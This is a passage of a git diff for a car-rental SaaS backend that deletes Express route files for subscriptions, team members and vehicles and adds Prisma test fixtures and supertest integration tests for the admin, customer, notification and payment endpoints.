res, next) => { - try { - const updated = await prisma.subscription.update({ - where: { companyId: req.companyId }, - data: { cancelAtPeriodEnd: false }, - }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -// ─── Helpers ───────────────────────────────────────────────────────────────── - -function addPeriod(date: Date, period: string): Date { - const d = new Date(date) - if (period === 'ANNUAL') { - d.setFullYear(d.getFullYear() + 1) - } else { - d.setMonth(d.getMonth() + 1) - } - return d -} - -export default router diff --git a/apps/api/src/routes/team.ts b/apps/api/src/routes/team.ts deleted file mode 100644 index 1dd4622..0000000 --- a/apps/api/src/routes/team.ts +++ /dev/null @@ -1,66 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { listEmployees, inviteEmployee, updateEmployeeRole, deactivateEmployee, reactivateEmployee, removeEmployee } from '../services/teamService' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' - -const router = Router() -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const inviteSchema = z.object({ - firstName: z.string().min(1).max(64), - lastName: z.string().min(1).max(64), - email: z.string().email(), - role: z.enum(['MANAGER', 'AGENT']), -}) - -router.get('/', async (req, res, next) => { - try { res.json({ data: await listEmployees(req.companyId) }) } catch (err) { next(err) } -}) - -router.get('/stats', async (req, res, next) => { - try { - const members = await listEmployees(req.companyId) - res.json({ data: { total: members.length, active: members.filter((m) => m.isActive && m.invitationStatus === 'accepted').length, pending: members.filter((m) => m.invitationStatus === 'pending').length, inactive: members.filter((m) => !m.isActive && m.invitationStatus === 'accepted').length } }) - } catch (err) { next(err) } -}) - -router.post('/invite', requireRole('OWNER'), async (req, res, next) => { - try { - const body = inviteSchema.parse(req.body) - res.status(201).json({ data: await inviteEmployee(req.companyId!, req.employee!.id, body) }) - } catch (err) { next(err) } -}) - -router.patch('/:id/role', requireRole('OWNER'), async (req, res, next) => { - try { - const { role } = z.object({ role: z.enum(['MANAGER', 'AGENT']) }).parse(req.body) - const memberId = req.params.id! - res.json({ data: await updateEmployeeRole(req.companyId!, req.employee!.id, req.employee!.role, memberId, { role }) }) - } catch (err) { next(err) } -}) - -router.post('/:id/deactivate', requireRole('OWNER'), async (req, res, next) => { - try { - const memberId = req.params.id! - res.json({ data: await deactivateEmployee(req.companyId!, req.employee!.role, memberId) }) - } catch (err) { next(err) } -}) - -router.post('/:id/reactivate', requireRole('OWNER'), async (req, res, next) => { - try { - const memberId = req.params.id! - res.json({ data: await reactivateEmployee(req.companyId!, req.employee!.role, memberId) }) - } catch (err) { next(err) } -}) - -router.delete('/:id', requireRole('OWNER'), async (req, res, next) => { - try { - const memberId = req.params.id! - res.json({ data: await removeEmployee(req.companyId!, req.employee!.role, memberId) }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/vehicles.ts b/apps/api/src/routes/vehicles.ts deleted file mode 100644 index 06825b7..0000000 --- a/apps/api/src/routes/vehicles.ts +++ /dev/null @@ -1,285 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import multer from 'multer' -import { prisma } from '../lib/prisma' -import { uploadImage } from '../lib/storage' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' - -const router = Router() -const upload = multer({ storage: multer.memoryStorage(), limits: { fileSize: 10 * 1024 * 1024 } }) - -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const vehicleSchema = z.object({ - make: z.string().min(1), - model: z.string().min(1), - year: z.number().int().min(1990).max(new Date().getFullYear() + 1), - color: z.string().default(''), - licensePlate: z.string().min(1), - vin: z.string().optional(), - category: z.enum(['ECONOMY','COMPACT','MIDSIZE','FULLSIZE','SUV','LUXURY','VAN','TRUCK']), - seats: z.number().int().min(1).max(20).default(5), - transmission: z.enum(['AUTOMATIC','MANUAL']).default('AUTOMATIC'), - fuelType: z.enum(['GASOLINE','DIESEL','ELECTRIC','HYBRID']).default('GASOLINE'), - features: z.array(z.string()).default([]), - dailyRate: z.number().int().min(0), - mileage: z.number().int().optional(), - notes: z.string().optional(), - isPublished: z.boolean().default(true), - status: z.enum(['AVAILABLE', 'RENTED', 'MAINTENANCE', 'OUT_OF_SERVICE']).optional(), -}) - -router.get('/', async (req, res, next) => { - try { - const { status, category, published, page = '1', pageSize = '20' } = req.query as Record - const where: any = { companyId: req.companyId } - if (status) where.status = status - if (category) where.category = category - if (published !== undefined) where.isPublished = published === 'true' - - const [vehicles, total] = await Promise.all([ - prisma.vehicle.findMany({ where, skip: (parseInt(page) - 1) * parseInt(pageSize), take: parseInt(pageSize), orderBy: { createdAt: 'desc' } }), - prisma.vehicle.count({ where }), - ]) - - res.json({ data: vehicles, total, page: parseInt(page), pageSize: parseInt(pageSize), totalPages: Math.ceil(total / parseInt(pageSize)) }) - } catch (err) { next(err) } -}) - -router.post('/', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = vehicleSchema.parse(req.body) - const vehicle = await prisma.vehicle.create({ data: { ...body, companyId: req.companyId } }) - res.status(201).json({ data: vehicle }) - } catch (err) { next(err) } -}) - -router.get('/:id', async (req, res, next) => { - try { - const vehicle = await prisma.vehicle.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - res.json({ data: vehicle }) - } catch (err) { next(err) } -}) - -router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = vehicleSchema.partial().parse(req.body) - if (body.status === 'MAINTENANCE' || body.status === 'OUT_OF_SERVICE') { - body.isPublished = false - } else if (body.status === 'AVAILABLE' || body.status === 'RENTED') { - body.isPublished = true - } - const existing = await prisma.vehicle.findFirst({ where: { id: req.params.id, companyId: req.companyId } }) - if (!existing) return res.status(404).json({ error: 'not_found', message: 'Vehicle not found', statusCode: 404 }) - const updated = await prisma.vehicle.update({ where: { id: req.params.id }, data: body }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.delete('/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.vehicle.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { status: 'OUT_OF_SERVICE', isPublished: false } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/:id/photos', requireRole('MANAGER'), upload.array('photos', 10), async (req, res, next) => { - try { - const vehicle = await prisma.vehicle.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - const files = req.files as Express.Multer.File[] - const urls = await Promise.all(files.map((f) => uploadImage(f.buffer, `companies/${req.companyId}/vehicles`))) - const updated = await prisma.vehicle.update({ where: { id: vehicle.id }, data: { photos: [...vehicle.photos, ...urls] } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.delete('/:id/photos/:idx', requireRole('MANAGER'), async (req, res, next) => { - try { - const { id, idx: idxParam } = z.object({ id: z.string(), idx: z.string() }).parse(req.params) - const vehicle = await prisma.vehicle.findFirstOrThrow({ where: { id, companyId: req.companyId } }) - const idx = parseInt(idxParam, 10) - const photos = vehicle.photos.filter((_: string, i: number) => i !== idx) - const updated = await prisma.vehicle.update({ where: { id: vehicle.id }, data: { photos } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.patch('/:id/publish', requireRole('MANAGER'), async (req, res, next) => { - try { - const { isPublished } = z.object({ isPublished: z.boolean() }).parse(req.body) - await prisma.vehicle.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { isPublished } }) - res.json({ data: { success: true, isPublished } }) - } catch (err) { next(err) } -}) - -router.get('/:id/availability', async (req, res, next) => { - try { - const { startDate, endDate } = req.query as Record - if (!startDate || !endDate) return res.status(400).json({ error: 'missing_params', message: 'startDate and endDate required', statusCode: 400 }) - - const start = new Date(startDate) - const end = new Date(endDate) - - const [reservationConflicts, blockConflicts] = await Promise.all([ - prisma.reservation.findMany({ - where: { - vehicleId: req.params.id, - companyId: req.companyId, - status: { in: ['CONFIRMED', 'ACTIVE'] }, - startDate: { lt: end }, - endDate: { gt: start }, - }, - select: { id: true, startDate: true, endDate: true, status: true }, - }), - prisma.vehicleCalendarBlock.findMany({ - where: { - vehicleId: req.params.id, - startDate: { lt: end }, - endDate: { gt: start }, - }, - select: { id: true, startDate: true, endDate: true, type: true, reason: true }, - }), - ]) - - res.json({ - data: { - available: reservationConflicts.length === 0 && blockConflicts.length === 0, - conflicts: reservationConflicts, - blocks: blockConflicts, - }, - }) - } catch (err) { next(err) } -}) - -router.get('/:id/calendar', async (req, res, next) => { - try { - const year = parseInt(req.query.year as string) - const month = parseInt(req.query.month as string) - if (isNaN(year) || isNaN(month) || month < 1 || month > 12) { - return res.status(400).json({ error: 'invalid_params', message: 'year and month (1-12) required', statusCode: 400 }) - } - - // Validate vehicle belongs to company - await prisma.vehicle.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - - const rangeStart = new Date(year, month - 1, 1) - const rangeEnd = new Date(year, month, 1) - - const [reservations, blocks] = await Promise.all([ - prisma.reservation.findMany({ - where: { - vehicleId: req.params.id, - companyId: req.companyId, - status: { in: ['DRAFT', 'CONFIRMED', 'ACTIVE'] }, - startDate: { lt: rangeEnd }, - endDate: { gt: rangeStart }, - }, - select: { - id: true, startDate: true, endDate: true, status: true, - customer: { select: { firstName: true, lastName: true } }, - }, - orderBy: { startDate: 'asc' }, - }), - prisma.vehicleCalendarBlock.findMany({ - where: { - vehicleId: req.params.id, - startDate: { lt: rangeEnd }, - endDate: { gt: rangeStart }, - }, - orderBy: { startDate: 'asc' }, - }), - ]) - - const events = [ - ...reservations.map((r) => ({ - id: r.id, - type: 'RESERVATION' as const, - startDate: r.startDate, - endDate: r.endDate, - status: r.status, - label: r.customer ? `${r.customer.firstName} ${r.customer.lastName}` : 'Reserved', - })), - ...blocks.map((b) => ({ - id: b.id, - type: b.type === 'MAINTENANCE' ? 'MAINTENANCE' as const : 'BLOCK' as const, - startDate: b.startDate, - endDate: b.endDate, - status: null, - label: b.reason ?? (b.type === 'MAINTENANCE' ? 'Maintenance' : 'Blocked'), - })), - ] - - res.json({ data: events }) - } catch (err) { next(err) } -}) - -router.post('/:id/calendar/blocks', requireRole('MANAGER'), async (req, res, next) => { - try { - const { id } = z.object({ id: z.string() }).parse(req.params) - const body = z.object({ - startDate: z.string().datetime({ offset: true }).or(z.string().regex(/^\d{4}-\d{2}-\d{2}$/)), - endDate: z.string().datetime({ offset: true }).or(z.string().regex(/^\d{4}-\d{2}-\d{2}$/)), - reason: z.string().optional(), - type: z.enum(['MANUAL', 'MAINTENANCE']).default('MANUAL'), - }).parse(req.body) - - const start = new Date(body.startDate) - const end = new Date(body.endDate) - if (end <= start) return res.status(400).json({ error: 'invalid_range', message: 'endDate must be after startDate', statusCode: 400 }) - - await prisma.vehicle.findFirstOrThrow({ where: { id, companyId: req.companyId } }) - - const block = await prisma.vehicleCalendarBlock.create({ - data: { - vehicleId: id, - startDate: start, - endDate: end, - reason: body.reason, - type: body.type, - }, - }) - res.status(201).json({ data: block }) - } catch (err) { next(err) } -}) - -router.delete('/:id/calendar/blocks/:blockId', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.vehicle.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - await prisma.vehicleCalendarBlock.deleteMany({ - where: { id: req.params.blockId, vehicleId: req.params.id }, - }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/:id/maintenance', async (req, res, next) => { - try { - const logs = await prisma.maintenanceLog.findMany({ where: { vehicleId: req.params.id }, orderBy: { performedAt: 'desc' } }) - res.json({ data: logs }) - } catch (err) { next(err) } -}) - -router.post('/:id/maintenance', requireRole('MANAGER'), async (req, res, next) => { - try { - const { id } = z.object({ id: z.string() }).parse(req.params) - const body = z.object({ - type: z.string().min(1), - description: z.string().optional(), - cost: z.number().int().optional(), - mileage: z.number().int().optional(), - performedAt: z.string().datetime(), - nextDueAt: z.string().datetime().optional(), - nextDueMileage: z.number().int().optional(), - }).parse(req.body) - - // Validate vehicle belongs to company - await prisma.vehicle.findFirstOrThrow({ where: { id, companyId: req.companyId } }) - const log = await prisma.maintenanceLog.create({ data: { ...body, vehicleId: id, performedAt: new Date(body.performedAt), nextDueAt: body.nextDueAt ? new Date(body.nextDueAt) : undefined } }) - res.status(201).json({ data: log }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/tests/helpers/fixtures.ts b/apps/api/src/tests/helpers/fixtures.ts new file mode 100644 index 0000000..6f9e042 --- /dev/null +++ b/apps/api/src/tests/helpers/fixtures.ts @@ -0,0 +1,241 @@ +import bcrypt from 'bcryptjs' +import jwt from 'jsonwebtoken' +import { prisma } from '../../lib/prisma' + +const JWT_SECRET = process.env.JWT_SECRET ?? 'test-secret' + +let counter = 0 +function uid() { + return `${Date.now()}-${++counter}-${Math.random().toString(36).slice(2, 7)}` +} + +export async function createCompanyWithEmployee(overrides: { + role?: 'OWNER' | 'MANAGER' | 'AGENT' + companyStatus?: 'ACTIVE' | 'TRIALING' | 'PAST_DUE' | 'SUSPENDED' | 'PENDING' +} = {}) { + const slug = `test-${uid()}` + const company = await prisma.company.create({ + data: { + name: `Test Company ${slug}`, + slug, + email: `company-${slug}@test.com`, + status: (overrides.companyStatus ?? 'ACTIVE') as any, + subscription: { + create: { status: 'TRIALING', plan: 'STARTER' }, + }, + }, + }) + + const employee = await prisma.employee.create({ + data: { + companyId: company.id, + clerkUserId: `clerk_${uid()}`, + firstName: 'Test', + lastName: 'User', + email: `employee-${uid()}@test.com`, + role: overrides.role ?? 'OWNER', + }, + }) + + return { company, employee } +} + +export async function createVehicle(companyId: string, overrides: Record = {}) { + return prisma.vehicle.create({ + data: { + companyId, + make: 'Toyota', + model: 'Corolla', + year: 2022, + color: 'White', + licensePlate: `PL-${uid()}`, + dailyRate: 500, + status: 'AVAILABLE', + isPublished: true, + ...overrides, + } as any, + }) +} + +export async function createCustomer(companyId: string, overrides: Record = {}) { + return prisma.customer.create({ + data: { + companyId, + firstName: 'Jane', + lastName: 'Doe', + email: `customer-${uid()}@test.com`, + ...overrides, + }, + }) +} + +export async function createRenter(overrides: { + firstName?: string + lastName?: string + email?: string + password?: string + isActive?: boolean +} = {}) { + return prisma.renter.create({ + data: { + firstName: overrides.firstName ?? 'Renter', + lastName: overrides.lastName ?? 'User', + email: overrides.email ?? `renter-${uid()}@test.com`, + passwordHash: await bcrypt.hash(overrides.password ?? 'RenterPass123!', 10), + isActive: overrides.isActive ?? true, + }, + }) +} + +export async function createAdminUser(overrides: { + email?: string + firstName?: string + lastName?: string + password?: string + role?: 'SUPER_ADMIN' | 'ADMIN' | 'SUPPORT' | 'FINANCE' | 'VIEWER' + isActive?: boolean + totpEnabled?: boolean + totpSecret?: string | null +} = {}) { + return prisma.adminUser.create({ + data: { + email: overrides.email ?? `admin-${uid()}@test.com`, + firstName: overrides.firstName ?? 'Admin', + lastName: overrides.lastName ?? 'User', + passwordHash: await bcrypt.hash(overrides.password ?? 'AdminPass123!', 10), + role: (overrides.role ?? 'ADMIN') as any, + isActive: overrides.isActive ?? true, + totpEnabled: overrides.totpEnabled ?? false, + totpSecret: overrides.totpSecret ?? null, + }, + }) +} + +export async function createReservation( + companyId: string, + vehicleId: string, + customerId: string, + overrides: Record = {}, +) { + return prisma.reservation.create({ + data: { + companyId, + vehicleId, + customerId, + startDate: new Date(Date.now() + 24 * 60 * 60 * 1000), + endDate: new Date(Date.now() + 4 * 24 * 60 * 60 * 1000), + dailyRate: 500, + totalDays: 3, + totalAmount: 1500, + depositAmount: 300, + status: 'CONFIRMED', + paymentStatus: 'UNPAID', + paidAmount: 0, + ...overrides, + } as any, + }) +} + +export async function createRentalPayment( + companyId: string, + reservationId: string, + overrides: Record = {}, +) { + return prisma.rentalPayment.create({ + data: { + companyId, + reservationId, + amount: 500, + currency: 'MAD', + status: 'SUCCEEDED', + type: 'CHARGE', + paymentProvider: 'AMANPAY', + amanpayTransactionId: `aman-${uid()}`, + paidAt: new Date(), + ...overrides, + } as any, + }) +} + +export async function createSubscriptionInvoice( + companyId: string, + subscriptionId: string, + overrides: Record = {}, +) { + return prisma.subscriptionInvoice.create({ + data: { + companyId, + subscriptionId, + amount: 29900, + currency: 'MAD', + status: 'PENDING', + paymentProvider: 'AMANPAY', + amanpayTransactionId: `sub-${uid()}`, + ...overrides, + } as any, + }) +} + +export async function createCompanyNotification( + companyId: string, + employeeId?: string, + overrides: Record = {}, +) { + return prisma.notification.create({ + data: { + companyId, + employeeId, + type: 'PAYMENT_RECEIVED', + title: 'Payment received', + body: 'A payment was recorded.', + channel: 'IN_APP', + status: 'PENDING', + ...overrides, + } as any, + }) +} + +export async function createRenterNotification( + renterId: string, + overrides: Record = {}, +) { + return prisma.notification.create({ + data: { + renterId, + type: 'BOOKING_CONFIRMED', + title: 'Booking confirmed', + body: 'Your booking is confirmed.', + channel: 'IN_APP', + status: 'PENDING', + ...overrides, + } as any, + }) +} + +export function signEmployeeToken(employeeId: string, companyId: string, role: string = 'OWNER') { + return jwt.sign( + { sub: employeeId, companyId, role, type: 'employee' }, + JWT_SECRET, + { expiresIn: '1h' }, + ) +} + +export function signAdminToken(adminId: string) { + return jwt.sign( + { sub: adminId, type: 'admin' }, + JWT_SECRET, + { expiresIn: '1h' }, + ) +} + +export function signRenterToken(renterId: string) { + return jwt.sign( + { sub: renterId, type: 'renter' }, + JWT_SECRET, + { expiresIn: '1h' }, + ) +} + +export function authHeader(token: string) { + return { Authorization: `Bearer ${token}` } +} diff --git a/apps/api/src/tests/integration/admin.test.ts b/apps/api/src/tests/integration/admin.test.ts new file mode 100644 index 0000000..c8532b3 --- /dev/null +++ b/apps/api/src/tests/integration/admin.test.ts @@ -0,0 +1,139 @@ +import request from 'supertest' +import { createApp } from '../../app' +import { + authHeader, + createAdminUser, + createCompanyWithEmployee, + createRenter, + signAdminToken, +} from '../helpers/fixtures' + +const app = createApp() + +describe('Admin API', () => { + let adminToken: string + let financeToken: string + let viewerToken: string + let adminId: string + let companyId: string + + beforeAll(async () => { + const admin = await createAdminUser({ + email: 'admin-login@test.com', + firstName: 'Primary', + lastName: 'Admin', + role: 'ADMIN', + password: 'AdminPass123!', + }) + adminId = admin.id + adminToken = signAdminToken(admin.id) + + const financeAdmin = await createAdminUser({ + email: 'finance-admin@test.com', + role: 'FINANCE', + password: 'FinancePass123!', + }) + financeToken = signAdminToken(financeAdmin.id) + + const viewerAdmin = await createAdminUser({ + email: 'viewer-admin@test.com', + role: 'VIEWER', + password: 'ViewerPass123!', + }) + viewerToken = signAdminToken(viewerAdmin.id) + + const { company } = await createCompanyWithEmployee() + companyId = company.id + await createRenter() + }) + + describe('POST /api/v1/admin/auth/login', () => { + it('returns 401 for invalid credentials', async () => { + const res = await request(app) + .post('/api/v1/admin/auth/login') + .send({ + email: 'admin-login@test.com', + password: 'wrong-password', + }) + + expect(res.status).toBe(401) + expect(res.body.error).toBe('invalid_credentials') + }) + + it('returns a token for valid credentials', async () => { + const res = await request(app) + .post('/api/v1/admin/auth/login') + .send({ + email: 'admin-login@test.com', + password: 'AdminPass123!', + }) + + expect(res.status).toBe(200) + expect(typeof res.body.data.data.token).toBe('string') + expect(res.body.data.data.admin.id).toBe(adminId) + }) + }) + + describe('GET /api/v1/admin/auth/me', () => { + it('returns the authenticated admin profile', async () => { + const res = await request(app) + .get('/api/v1/admin/auth/me') + .set(authHeader(adminToken)) + + expect(res.status).toBe(200) + expect(res.body.data.data.id).toBe(adminId) + expect(res.body.data.data).not.toHaveProperty('passwordHash') + }) + }) + + describe('GET /api/v1/admin/companies', () => { + it('returns paginated companies', async () => { + const res = await request(app) + .get('/api/v1/admin/companies') + .set(authHeader(adminToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(typeof res.body.data.total).toBe('number') + expect(res.body.data.data.some((item: any) => item.id === companyId)).toBe(true) + }) + }) + + describe('GET /api/v1/admin/renters', () => { + it('returns paginated renters', async () => { + const res = await request(app) + .get('/api/v1/admin/renters') + .set(authHeader(adminToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(typeof res.body.data.total).toBe('number') + expect(res.body.data.total).toBeGreaterThanOrEqual(1) + }) + }) + + describe('GET /api/v1/admin/metrics', () => { + it('returns 403 for VIEWER role', async () => { + const res = await request(app) + .get('/api/v1/admin/metrics') + .set(authHeader(viewerToken)) + + expect(res.status).toBe(403) + }) + + it('returns platform metrics for FINANCE role', async () => { + const res = await request(app) + .get('/api/v1/admin/metrics') + .set(authHeader(financeToken)) + + expect(res.status).toBe(200) + expect(res.body.data.data).toEqual( + expect.objectContaining({ + totalCompanies: expect.any(Number), + totalRenters: expect.any(Number), + totalReservations: expect.any(Number), + }), + ) + }) + }) +}) diff --git a/apps/api/src/tests/integration/customers.test.ts b/apps/api/src/tests/integration/customers.test.ts new file mode 100644 index 0000000..fce177c --- /dev/null +++ b/apps/api/src/tests/integration/customers.test.ts @@ -0,0 +1,131 @@ +import request from 'supertest' +import { createApp } from '../../app' +import { + createCompanyWithEmployee, + createCustomer, + signEmployeeToken, + authHeader, +} from '../helpers/fixtures' + +const app = createApp() + +describe('Customers API', () => { + let companyId: string + let token: string + let agentToken: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + token = signEmployeeToken(employee.id, companyId, 'OWNER') + + const { employee: agent } = await createCompanyWithEmployee({ role: 'AGENT' }) + agentToken = signEmployeeToken(agent.id, agent.companyId, 'AGENT') + }) + + describe('GET /api/v1/customers', () => { + it('returns 401 without auth', async () => { + const res = await request(app).get('/api/v1/customers') + expect(res.status).toBe(401) + }) + + it('returns paginated customer list', async () => { + await createCustomer(companyId) + await createCustomer(companyId) + + const res = await request(app) + .get('/api/v1/customers') + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(typeof res.body.total).toBe('number') + expect(res.body.total).toBeGreaterThanOrEqual(2) + expect(Array.isArray(res.body.data)).toBe(true) + }) + + it('filters by search query q', async () => { + await createCustomer(companyId, { firstName: 'Unique', lastName: 'Xyzzy' }) + + const res = await request(app) + .get('/api/v1/customers?q=Xyzzy') + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(res.body.total).toBeGreaterThanOrEqual(1) + expect(res.body.data[0].lastName).toBe('Xyzzy') + }) + }) + + describe('POST /api/v1/customers', () => { + it('creates a new customer', async () => { + const res = await request(app) + .post('/api/v1/customers') + .set(authHeader(token)) + .send({ + firstName: 'Alice', + lastName: 'Smith', + email: `alice-${Date.now()}@example.com`, + }) + + expect(res.status).toBe(201) + expect(res.body.data.firstName).toBe('Alice') + expect(res.body.data.lastName).toBe('Smith') + }) + + it('returns 400 for missing required fields', async () => { + const res = await request(app) + .post('/api/v1/customers') + .set(authHeader(token)) + .send({ firstName: 'Noemail' }) + + expect(res.status).toBe(400) + }) + }) + + describe('GET /api/v1/customers/:id', () => { + it('returns a single customer', async () => { + const customer = await createCustomer(companyId, { firstName: 'Bob', lastName: 'Test' }) + + const res = await request(app) + .get(`/api/v1/customers/${customer.id}`) + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(res.body.data.id).toBe(customer.id) + expect(res.body.data.firstName).toBe('Bob') + }) + + it('returns 404 for unknown id', async () => { + const res = await request(app) + .get('/api/v1/customers/clzunknownidzzzzzzzzzzz') + .set(authHeader(token)) + + expect(res.status).toBe(404) + }) + }) + + describe('POST /api/v1/customers/:id/flag', () => { + it('flags a customer (MANAGER+)', async () => { + const customer = await createCustomer(companyId) + + const res = await request(app) + .post(`/api/v1/customers/${customer.id}/flag`) + .set(authHeader(token)) + .send({ reason: 'Suspicious activity' }) + + expect(res.status).toBe(200) + expect(res.body.data.success).toBe(true) + }) + + it('returns 403 for AGENT role', async () => { + const customer = await createCustomer(companyId) + + const res = await request(app) + .post(`/api/v1/customers/${customer.id}/flag`) + .set(authHeader(agentToken)) + .send({ reason: 'Test' }) + + expect(res.status).toBe(403) + }) + }) +}) diff --git a/apps/api/src/tests/integration/health.test.ts b/apps/api/src/tests/integration/health.test.ts new file mode 100644 index 0000000..9642048 --- /dev/null +++ b/apps/api/src/tests/integration/health.test.ts @@ -0,0 +1,21 @@ +import request from 'supertest' +import { createApp } from '../../app' + +const app = createApp() + +describe('GET /health', () => { + it('returns 200 with status ok', async () => { + const res = await request(app).get('/health') + expect(res.status).toBe(200) + expect(res.body.status).toBe('ok') + expect(res.body.version).toBe('1.0.0') + expect(typeof res.body.timestamp).toBe('string') + }) + + it('GET /api/v1/docs returns route index', async () => { + const res = await request(app).get('/api/v1/docs') + expect(res.status).toBe(200) + expect(res.body.name).toBe('rentaldrivego-api') + expect(Array.isArray(res.body.routes)).toBe(true) + }) +}) diff --git a/apps/api/src/tests/integration/notifications.test.ts b/apps/api/src/tests/integration/notifications.test.ts new file mode 100644 index 0000000..b39925a --- /dev/null +++ b/apps/api/src/tests/integration/notifications.test.ts @@ -0,0 +1,146 @@ +import request from 'supertest' +import { createApp } from '../../app' +import { + authHeader, + createCompanyNotification, + createCompanyWithEmployee, + createRenter, + createRenterNotification, + signEmployeeToken, + signRenterToken, +} from '../helpers/fixtures' + +const app = createApp() + +describe('Notifications API', () => { + let companyId: string + let employeeId: string + let ownerToken: string + let renterId: string + let renterToken: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + employeeId = employee.id + ownerToken = signEmployeeToken(employee.id, companyId, 'OWNER') + + const renter = await createRenter() + renterId = renter.id + renterToken = signRenterToken(renter.id) + }) + + describe('Company notifications', () => { + it('returns unread count', async () => { + const res = await request(app) + .get('/api/v1/notifications/unread-count') + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(typeof res.body.data.data.unread).toBe('number') + }) + + it('lists company notifications and supports unread filtering', async () => { + const unread = await createCompanyNotification(companyId, employeeId, { title: 'Unread company notice' }) + await createCompanyNotification(companyId, employeeId, { + title: 'Read company notice', + readAt: new Date(), + status: 'READ', + }) + + const res = await request(app) + .get('/api/v1/notifications/company?unread=true') + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(res.body.data.data.some((item: any) => item.id === unread.id)).toBe(true) + expect(res.body.data.data.every((item: any) => item.readAt === null)).toBe(true) + }) + + it('marks a company notification as read', async () => { + const notification = await createCompanyNotification(companyId, employeeId) + + const res = await request(app) + .post(`/api/v1/notifications/company/${notification.id}/read`) + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(res.body.data.data.success).toBe(true) + }) + + it('updates company notification preferences', async () => { + const payload = [ + { notificationType: 'PAYMENT_RECEIVED', channel: 'EMAIL', enabled: false }, + ] + + const patchRes = await request(app) + .patch('/api/v1/notifications/company/preferences') + .set(authHeader(ownerToken)) + .send(payload) + + expect(patchRes.status).toBe(200) + expect(patchRes.body.data.data.success).toBe(true) + + const getRes = await request(app) + .get('/api/v1/notifications/company/preferences') + .set(authHeader(ownerToken)) + + expect(getRes.status).toBe(200) + expect(getRes.body.data.data).toEqual( + expect.arrayContaining([ + expect.objectContaining({ + employeeId, + notificationType: 'PAYMENT_RECEIVED', + channel: 'EMAIL', + enabled: false, + }), + ]), + ) + }) + }) + + describe('Renter notifications', () => { + it('lists renter notifications', async () => { + const notification = await createRenterNotification(renterId) + + const res = await request(app) + .get('/api/v1/notifications/renter') + .set(authHeader(renterToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(res.body.data.data.some((item: any) => item.id === notification.id)).toBe(true) + }) + + it('updates renter notification preferences', async () => { + const payload = [ + { notificationType: 'BOOKING_CONFIRMED', channel: 'PUSH', enabled: true }, + ] + + const patchRes = await request(app) + .patch('/api/v1/notifications/renter/preferences') + .set(authHeader(renterToken)) + .send(payload) + + expect(patchRes.status).toBe(200) + expect(patchRes.body.data.data.success).toBe(true) + + const getRes = await request(app) + .get('/api/v1/notifications/renter/preferences') + .set(authHeader(renterToken)) + + expect(getRes.status).toBe(200) + expect(getRes.body.data.data).toEqual( + expect.arrayContaining([ + expect.objectContaining({ + renterId, + notificationType: 'BOOKING_CONFIRMED', + channel: 'PUSH', + enabled: true, + }), + ]), + ) + }) + }) +}) diff --git a/apps/api/src/tests/integration/payments.test.ts b/apps/api/src/tests/integration/payments.test.ts new file mode 100644 index 0000000..bb28016 --- /dev/null +++ b/apps/api/src/tests/integration/payments.test.ts @@ -0,0 +1,159 @@ +import request from 'supertest' +import { prisma } from '../../lib/prisma' +import { createApp } from '../../app' +import { + authHeader, + createCompanyWithEmployee, + createCustomer, + createRentalPayment, + createReservation, + createVehicle, + signEmployeeToken, +} from '../helpers/fixtures' + +const app = createApp() + +function uniqueEmail(prefix: string) { + return `${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}@test.com` +} + +describe('Payments API', () => { + let companyId: string + let ownerToken: string + let agentToken: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + ownerToken = signEmployeeToken(employee.id, companyId, 'OWNER') + + const agent = await prisma.employee.create({ + data: { + companyId, + clerkUserId: `clerk_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`, + firstName: 'Agent', + lastName: 'User', + email: uniqueEmail('agent'), + role: 'AGENT', + }, + }) + agentToken = signEmployeeToken(agent.id, companyId, 'AGENT') + }) + + describe('GET /api/v1/payments/company', () => { + it('returns 401 without auth', async () => { + const res = await request(app).get('/api/v1/payments/company') + expect(res.status).toBe(401) + }) + + it('returns company payments', async () => { + const vehicle = await createVehicle(companyId) + const customer 